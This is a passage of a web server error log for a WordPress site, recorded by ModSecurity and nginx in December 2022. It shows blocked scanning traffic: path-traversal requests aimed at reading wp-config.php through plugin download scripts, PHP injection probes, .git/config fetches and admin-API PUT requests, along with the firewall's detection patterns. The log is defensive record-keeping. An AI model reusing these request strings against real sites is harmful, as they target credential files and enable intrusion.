/wp-content/plugins/wp-ecommerce-shop-styling/includes/download.php?filename=../../../../wp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/wp-ecommerce-shop-styling/includes/download.php"] [unique_id "Y46iI0N1F9XDnIN63jfxFwAAAE8"], referer: https://www.google.com [Mon Dec 05 21:00:04.514555 2022] [:error] [pid 10906:tid 140206313236224] [client 5.75.225.88:33508] [client 5.75.225.88] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: /../ found within REQUEST_URI: /wp-content/plugins/web-portal-lite-client-portal-secure-file-sharing-private-messaging/includes/libs/pdf/dompdf.php?input_file=../../../../../../wp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/web-portal-lite-client-portal-secure-file-sharing-private-messaging/includes/libs/pdf/dompdf.php"] [unique_id "Y46iJEN1F9XDnIN63jfxGAAAAFE"], referer: https://www.google.com [Mon Dec 05 21:00:05.714673 2022] [:error] [pid 10906:tid 140206254487296] [client 5.75.225.88:33510] [client 5.75.225.88] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: /../ found within REQUEST_URI: /wp-content/plugins/post-pdf-export/dompdf/dompdf.php?input_file=../../../../wp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/post-pdf-export/dompdf/dompdf.php"] [unique_id "Y46iJUN1F9XDnIN63jfxGQAAAFg"], referer: https://www.google.com [Mon Dec 05 22:58:17.097415 2022] [:error] [pid 10905:tid 140206338414336] [client 208.113.171.102:36432] [client 208.113.171.102] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: /../ found within REQUEST_URI: /wp-content/plugins/media-library-assistant/includes/mla-file-downloader.php?mla_download_type=text/html&mla_download_file=../../../../wp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/media-library-assistant/includes/mla-file-downloader.php"] [unique_id "Y4692eFqX1ISMvIkymKYBQAAAA4"] [Tue Dec 06 03:16:20.596111 2022] [ssl:warn] [pid 25573:tid 140619395553152] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Tue Dec 06 03:16:20.728550 2022] [ssl:warn] [pid 25574:tid 140619395553152] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Tue Dec 06 03:16:21.105801 2022] [ssl:warn] [pid 25574:tid 140619395553152] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Tue Dec 06 03:16:22.759708 2022] [ssl:warn] [pid 25574:tid 140619395553152] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Tue Dec 06 03:16:25.067336 2022] [ssl:warn] [pid 25990:tid 139831213639552] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Tue Dec 06 03:16:25.204812 2022] [ssl:warn] [pid 25991:tid 139831213639552] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Tue Dec 06 09:25:32.767141 2022] [:error] [pid 26009:tid 139830839174912] [client 5.188.62.76:55422] [client 5.188.62.76] ModSecurity: Access denied with code 403 (phase 1). Match of "rx ^%{tx.allowed_request_content_type}$" against "TX:0" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "64"] [id "960010"] [rev "2"] [msg "Request content type is not allowed by policy"] [data "application/octet-stream"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/ENCODING_NOT_ALLOWED"] [tag "WASCTC/WASC-20"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/EE2"] [tag "PCI/12.1"] [hostname "investigacionperu.com"] [uri "/xmlrpc.php"] [unique_id "Y49Q3Cu5e2RzwunavU15lwAAAE8"] [Tue Dec 06 12:54:02.930572 2022] [autoindex:error] [pid 26010:tid 139830991054592] [client 5.161.110.101:33170] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Tue Dec 06 15:05:41.715225 2022] [ssl:warn] [pid 25991:tid 139831213639552] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Tue Dec 06 19:03:33.422512 2022] [ssl:warn] [pid 25991:tid 139831213639552] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Tue Dec 06 23:05:30.639737 2022] [:error] [pid 24648:tid 139830847567616] [client 5.188.62.140:55702] [client 5.188.62.140] ModSecurity: Access denied with code 403 (phase 1). Match of "rx ^%{tx.allowed_request_content_type}$" against "TX:0" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "64"] [id "960010"] [rev "2"] [msg "Request content type is not allowed by policy"] [data "application/octet-stream"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/ENCODING_NOT_ALLOWED"] [tag "WASCTC/WASC-20"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/EE2"] [tag "PCI/12.1"] [hostname "investigacionperu.com"] [uri "/xmlrpc.php"] [unique_id "Y5ARCt9QdmHoSoFNGCdsDgAAAE4"] [Wed Dec 07 03:32:29.628951 2022] [ssl:warn] [pid 22532:tid 140129127442304] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Wed Dec 07 03:32:29.794001 2022] [ssl:warn] [pid 22533:tid 140129127442304] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Wed Dec 07 03:32:30.139048 2022] [ssl:warn] [pid 22533:tid 140129127442304] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Wed Dec 07 03:32:31.502862 2022] [ssl:warn] [pid 22533:tid 140129127442304] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Wed Dec 07 03:32:33.782605 2022] [ssl:warn] [pid 22979:tid 140167552710528] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Wed Dec 07 03:32:33.897851 2022] [ssl:warn] [pid 22980:tid 140167552710528] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Wed Dec 07 04:41:41.592279 2022] [:error] [pid 23003:tid 140167372089088] [client 165.22.239.71:49872] [client 165.22.239.71] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: /../ found within REQUEST_URI: /wp-content/themes/churchope/lib/downloadlink.php?file=../../../../wp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/churchope/lib/downloadlink.php"] [unique_id "Y5Bf1VLKsdTBDy6kWhkp4QAAAEA"] [Wed Dec 07 07:00:07.671461 2022] [autoindex:error] [pid 23420:tid 140167188801280] [client 43.130.77.200:54438] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com [Wed Dec 07 15:33:32.090918 2022] [autoindex:error] [pid 23420:tid 140167213979392] [client 83.229.83.173:44110] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com [Wed Dec 07 16:16:31.246619 2022] [:error] [pid 23002:tid 140167172015872] [client 152.89.196.13:47156] [client 152.89.196.13] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:x. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: pi( found within ARGS:x: die(pi()*42);"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/core-stab/index.php"] [unique_id "Y5ECr9-s3XjE8hwt9uBCDAAAAA8"] [Wed Dec 07 19:37:00.948483 2022] [:error] [pid 23002:tid 140167213979392] [client 173.252.87.116:54646] [client 173.252.87.116] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-524287"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "investigacionperu.com"] [uri "/robots.txt"] [unique_id "Y5ExrN-s3XjE8hwt9uBEwgAAAAo"] [Thu Dec 08 03:44:26.386448 2022] [ssl:warn] [pid 30748:tid 139789973849984] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Thu Dec 08 03:44:26.504617 2022] [ssl:warn] [pid 30749:tid 139789973849984] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Thu Dec 08 03:44:26.999624 2022] [ssl:warn] [pid 30749:tid 139789973849984] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Thu Dec 08 03:44:29.019249 2022] [ssl:warn] [pid 30749:tid 139789973849984] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Thu Dec 08 03:44:31.314968 2022] [ssl:warn] [pid 31200:tid 140651883456384] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Thu Dec 08 03:44:31.430631 2022] [ssl:warn] [pid 31201:tid 140651883456384] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Thu Dec 08 05:18:52.771618 2022] [autoindex:error] [pid 31223:tid 140651437938432] [client 83.229.83.173:49412] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com [Thu Dec 08 14:06:51.684274 2022] [autoindex:error] [pid 31223:tid 140651538650880] [client 43.130.71.239:55312] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com [Thu Dec 08 19:35:56.489999 2022] [autoindex:error] [pid 31222:tid 140651580614400] [client 83.229.83.173:40388] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com 2022/12/08 22:09:18 [error] 31180#31180: *803998 access forbidden by rule, client: 3.126.231.55, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" 2022/12/08 22:09:19 [error] 31179#31179: *803999 access forbidden by rule, client: 3.126.231.55, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" 2022/12/08 22:09:19 [error] 31180#31180: *804000 access forbidden by rule, client: 3.126.231.55, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" 2022/12/08 22:09:19 [error] 31180#31180: *804001 access forbidden by rule, client: 3.126.231.55, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" 2022/12/08 22:09:20 [error] 31179#31179: *804004 access forbidden by rule, client: 3.126.231.55, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" 2022/12/08 22:09:20 [error] 31179#31179: *804005 access forbidden by rule, client: 3.126.231.55, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" [Thu Dec 08 22:24:53.603245 2022] [autoindex:error] [pid 2330:tid 140651530258176] [client 51.159.36.101:47558] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Thu Dec 08 23:36:18.156432 2022] [:error] [pid 2330:tid 140651547043584] [client 45.55.197.84:50210] [client 45.55.197.84] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: /../ found within REQUEST_URI: /wp-admin/admin-post.php?alg_wc_pif_download_file=../../../../../wp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-admin/admin-post.php"] [unique_id "Y5K7Qs33FPr-tRnZr1PCXAAAAQo"] 2022/12/09 00:42:51 [error] 31180#31180: *810778 access forbidden by rule, client: 159.65.51.215, server: webmail.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "webmail.investigacionperu.com" 2022/12/09 00:42:51 [error] 31179#31179: *810807 access forbidden by rule, client: 164.92.224.29, server: mail.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "mail.investigacionperu.com" 2022/12/09 00:42:52 [error] 31180#31180: *810861 access forbidden by rule, client: 159.65.51.215, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" [Fri Dec 09 00:42:52.029954 2022] [:error] [pid 2330:tid 140651429545728] [client 159.65.51.215:57822] [client 159.65.51.215] ModSecurity: Access denied with code 403 (phase 1). Match of "within %{tx.allowed_methods}" against "REQUEST_METHOD" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "31"] [id "960032"] [rev "2"] [msg "Method is not allowed by policy"] [data "PUT"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/METHOD_NOT_ALLOWED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A6"] [tag "OWASP_AppSensor/RE1"] [tag "PCI/12.1"] [hostname "investigacionperu.com"] [uri "/api/v2/cmdb/system/admin/admin"] [unique_id "Y5LK3M33FPr-tRnZr1PHCgAAARg"] [Fri Dec 09 00:42:52.160891 2022] [authz_core:error] [pid 22737:tid 140651471509248] [client 159.65.51.215:57846] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2022/12/09 00:42:52 [error] 31179#31179: *810904 access forbidden by rule, client: 165.227.232.121, server: cpanel.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "cpanel.investigacionperu.com" 2022/12/09 00:42:53 [error] 31180#31180: *810935 access forbidden by rule, client: 185.3.94.68, server: webmail.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "webmail.investigacionperu.com" 2022/12/09 00:42:54 [error] 31179#31179: *811002 access forbidden by rule, client: 164.92.224.29, server: mail.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "mail.investigacionperu.com" 2022/12/09 00:42:56 [error] 31179#31179: *811073 access forbidden by rule, client: 164.92.143.142, server: cpanel.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "cpanel.investigacionperu.com" [Fri Dec 09 00:42:56.561890 2022] [:error] [pid 2330:tid 140651479901952] [client 178.62.221.40:58036] [client 178.62.221.40] ModSecurity: Access denied with code 403 (phase 1). Match of "within %{tx.allowed_methods}" against "REQUEST_METHOD" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "31"] [id "960032"] [rev "2"] [msg "Method is not allowed by policy"] [data "PUT"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/METHOD_NOT_ALLOWED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A6"] [tag "OWASP_AppSensor/RE1"] [tag "PCI/12.1"] [hostname "investigacionperu.com"] [uri "/api/v2/cmdb/system/admin/admin"] [unique_id "Y5LK4M33FPr-tRnZr1PHEAAAARI"] 2022/12/09 00:42:56 [error] 31179#31179: *811095 access forbidden by rule, client: 178.62.221.40, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" [Fri Dec 09 00:42:56.694056 2022] [authz_core:error] [pid 31222:tid 140651521865472] [client 178.62.221.40:58046] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2022/12/09 00:42:57 [error] 31180#31180: *811128 access forbidden by rule, client: 172.104.249.218, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "www.investigacionperu.com" [Fri Dec 09 00:42:57.293212 2022] [:error] [pid 31222:tid 140651463116544] [client 172.104.249.218:58076] [client 172.104.249.218] ModSecurity: Access denied with code 403 (phase 1). Match of "within %{tx.allowed_methods}" against "REQUEST_METHOD" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "31"] [id "960032"] [rev "2"] [msg "Method is not allowed by policy"] [data "PUT"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/METHOD_NOT_ALLOWED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A6"] [tag "OWASP_AppSensor/RE1"] [tag "PCI/12.1"] [hostname "www.investigacionperu.com"] [uri "/api/v2/cmdb/system/admin/admin"] [unique_id "Y5LK4bbUh6owaPH9P23Q-QAAAFQ"] [Fri Dec 09 00:42:57.410881 2022] [authz_core:error] [pid 22711:tid 140651702834944] [client 172.104.249.218:58084] AH01630: client denied by server configuration: /home/investig/public_html/server-status [Fri Dec 09 15:34:10.845216 2022] [autoindex:error] [pid 20286:tid 139733178992384] [client 43.130.100.27:34604] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com [Fri Dec 09 17:26:57.085181 2022] [:error] [pid 19752:tid 139733391185664] [client 195.177.216.121:40794] [client 195.177.216.121] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:X-Dns-Prefetch-Control. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: md5( found within ARGS:X-Dns-Prefetch-Control: die(md5(76));"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/index.php"] [unique_id "Y5O2Ma9vZPbNhO9s29qTDQAAAIE"] [Fri Dec 09 23:18:56.191190 2022] [autoindex:error] [pid 20286:tid 139733246134016] [client 5.78.41.25:54344] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Sat Dec 10 08:57:45.633164 2022] [:error] [pid 15692:tid 140216513849088] [client 5.188.62.140:45036] [client 5.188.62.140] ModSecurity: Access denied with code 403 (phase 1). Match of "rx ^%{tx.allowed_request_content_type}$" against "TX:0" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "64"] [id "960010"] [rev "2"] [msg "Request content type is not allowed by policy"] [data "application/octet-stream"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/ENCODING_NOT_ALLOWED"] [tag "WASCTC/WASC-20"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/EE2"] [tag "PCI/12.1"] [hostname "investigacionperu.com"] [uri "/xmlrpc.php"] [unique_id "Y5SQWdQKb7PHIINSagK6HQAAAME"] [Sat Dec 10 09:58:37.006130 2022] [:error] [pid 14837:tid 140216522241792] [client 34.193.24.89:46860] [client 34.193.24.89] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: /../ found within REQUEST_URI: /wp-content/plugins/google-mp3-audio-player/direct_download.php?file=../../../wp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/google-mp3-audio-player/direct_download.php"] [unique_id "Y5SendMIIqg2KWGtC3gpeAAAAEA"] [Sat Dec 10 12:50:55.647897 2022] [:error] [pid 15692:tid 140216345995008] [client 5.188.62.76:52726] [client 5.188.62.76] ModSecurity: Access denied with code 403 (phase 1). Match of "rx ^%{tx.allowed_request_content_type}$" against "TX:0" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "64"] [id "960010"] [rev "2"] [msg "Request content type is not allowed by policy"] [data "application/octet-stream"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/ENCODING_NOT_ALLOWED"] [tag "WASCTC/WASC-20"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/EE2"] [tag "PCI/12.1"] [hostname "investigacionperu.com"] [uri "/xmlrpc.php"] [unique_id "Y5TG_9QKb7PHIINSagK9PAAAANU"] [Sat Dec 10 14:02:02.429567 2022] [:error] [pid 14838:tid 140216362780416] [client 5.188.62.26:54966] [client 5.188.62.26] ModSecurity: Access denied with code 403 (phase 1). Match of "rx ^%{tx.allowed_request_content_type}$" against "TX:0" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "64"] [id "960010"] [rev "2"] [msg "Request content type is not allowed by policy"] [data "application/octet-stream"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/ENCODING_NOT_ALLOWED"] [tag "WASCTC/WASC-20"] [tag 